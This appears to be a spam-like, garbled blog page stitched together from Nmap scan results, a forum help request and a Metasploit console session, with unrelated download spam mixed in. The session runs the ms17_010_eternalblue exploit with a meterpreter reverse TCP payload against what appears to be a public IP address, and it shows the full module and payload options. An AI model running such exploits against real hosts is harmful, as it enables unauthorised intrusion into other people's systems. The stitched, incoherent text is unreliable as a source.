The tools we use are Nmap, Nessus, Metasploit (the hacker’s framework, exploits are written in ruby). 443/tcp open https 445/tcp open microsoft-ds 464/tcp open kpasswd5 593/tcp open http-rpc-epmap 636/tcp open ldapssl. Which is used to control the permissions of built-in privileged Active Directory groups and their members. Ms_03_026_dcom worked once and doesn't work after a reverse shell death. I was testing the metasploit ms_03_026_dcom on a virtual host in a. VERSION 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds 3389/tcp open ms-wbt-server.
@busterb hi again here are the information
iam using nmap to check vulnerability and information about of target
Host is up (0.29s latency).
PORT STATE SERVICE 445/tcp open microsoft-ds
Host script results:
| smb-os-discovery: | OS: Windows Server 2008 R2 Standard 7601 Service Pack 1 (Windows Server 2008 R2 Standard 6.1) | OS CPE: cpe:/o:microsoft:windows_server_2008::sp1 | Computer name: SECURITYV01 | NetBIOS computer name: SECURITYV01x00 | Workgroup: WORKGROUPx00 |_ System time: 2017-06-15T20:35:03-05:00 | smb-vuln-ms17-10: | VULNERABLE: | Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010) | State: VULNERABLE | IDs: CVE:CVE-2017-0143 | Risk factor: HIGH | A critical remote code execution vulnerability exists in Microsoft SMBv1 | servers (ms17-010). | | Disclosure date: 2017-03-14 | References: | https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/ | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143 |_ https://technet.microsoft.com/en-us/library/security/ms17-010.aspx msf exploit(ms17_010_eternalblue) > exploit
[] Started reverse TCP handler on 192.168.0.106:4444
[] 190.11.20.72:445 - Connecting to target for exploitation. [-] 190.11.20.72:445 - RubySMB::Error::UnexpectedStatusCode: Error with login: (0xc000006d) STATUS_LOGON_FAILURE: The attempted logon is invalid. This is either due to a bad username or authentication information. [*] Exploit completed, but no session was created. msf exploit(ms17_010_eternalblue) > show options
Module options (exploit/windows/smb/ms17_010_eternalblue):
![]() ![]()
Name Current Setting Required Description
GroomAllocations 12 yes Initial number of times to groom the kernel pool.
GroomDelta 5 yes The amount to increase the groom count by per try. MaxExploitAttempts 3 yes The number of times to retry the exploit. ProcessName explorer.exe yes Process to inject payload into. RHOST 190.11.xx.xx yes The target address RPORT 445 yes The target port (TCP) SMBDomain . no (Optional) The Windows domain to use for authentication SMBPass no (Optional) The password for the specified username SMBUser no (Optional) The username to authenticate as VerifyArch true yes Check if remote architecture matches exploit Target. VerifyTarget true yes Check if remote OS matches exploit Target.
Whatsapp software free download for nokia 110. Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
EXITFUNC thread yes Exit technique (Accepted: ', seh, thread, process, none)
LHOST 192.168.0.106 yes The listen address LPORT 4444 yes The listen port Open Microsoft Download
Exploit target:
0 Windows 7 and Server 2008 R2 (x64) All Service Packs
thanks.
Comments are closed.
|
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |